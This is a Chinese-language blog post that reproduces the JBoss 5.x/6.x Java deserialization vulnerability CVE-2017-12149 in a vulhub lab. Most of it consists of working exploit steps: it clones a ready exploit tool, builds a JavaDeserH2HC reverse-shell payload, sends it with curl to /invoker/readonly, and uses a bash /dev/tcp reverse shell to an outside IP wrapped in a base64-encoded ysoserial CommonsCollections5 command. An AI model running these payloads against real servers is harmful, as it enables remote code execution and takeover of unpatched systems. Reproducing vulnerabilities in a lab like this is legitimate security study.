• JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)复现


    0x00 漏洞介绍

    该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。
    该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化:

    image.png

    0x01 环境搭建

    vulhub上一键搭建:https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

    image.png

    0x02漏洞复现

    方法一:现成的exp工具

    git clone https://github.com/yunxu1/jboss-_CVE-2017-12149
    image.png

    (请忽略虚拟机乱码问题)

    方法二:使用JavaDeserH2HC工具

    进入JavaDeserH2HC工作目录:

    javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
    java -cp .:commons-collections-3.2.1.jar  ReverseShellCommonsCollectionsHashMap ip:port //反弹shell的IP和端口
    此时会在当前目录生成ReverseShellCommonsCollectionsHashMap.ser二进制文件
    curl http://127.0.0.1:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
    

    反弹shell:

    image.png

    方法三:常规方法

    漏洞是因为接口/invoker/readonly将用户传入的post数据进行了反序列化导致的,所以我们先来构造反序列化语句。

    编写反弹shell语句

    bash -i >& /dev/tcp/49.233.44.168/12345 0>&
    程序是java的,Runtime.getRuntime().exec()语句中不能包含管道符等,所以需要将反弹shell语句编码
    编码网站:http://www.jackson-t.ca/runtime-exec-payloads.html

    image.png

    利用ysoserial 生成反序列化语句

    java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
    

    通过POST包发送poc,右键paste from file将生成的poc.ser文件导入post包:
    image.png

    反弹shell
    image.png

  • 相关阅读:
    操盘策略:判断强庄股的四个诀窍
    三类股有望继续走强
    操盘策略:股市空头陷阱五大招数
    每日一招:面对亏损我们应该如何操作(鳄鱼法则)
    (转)一个大户的自白:我是这样被两融打爆的
    3.2、迭代
    3.1、切片
    2.4、递归函数
    2.3、函数的参数
    2.2、定义函数
  • 原文地址:https://www.cnblogs.com/ffx1/p/12653543.html
Copyright © 2020-2023  润新知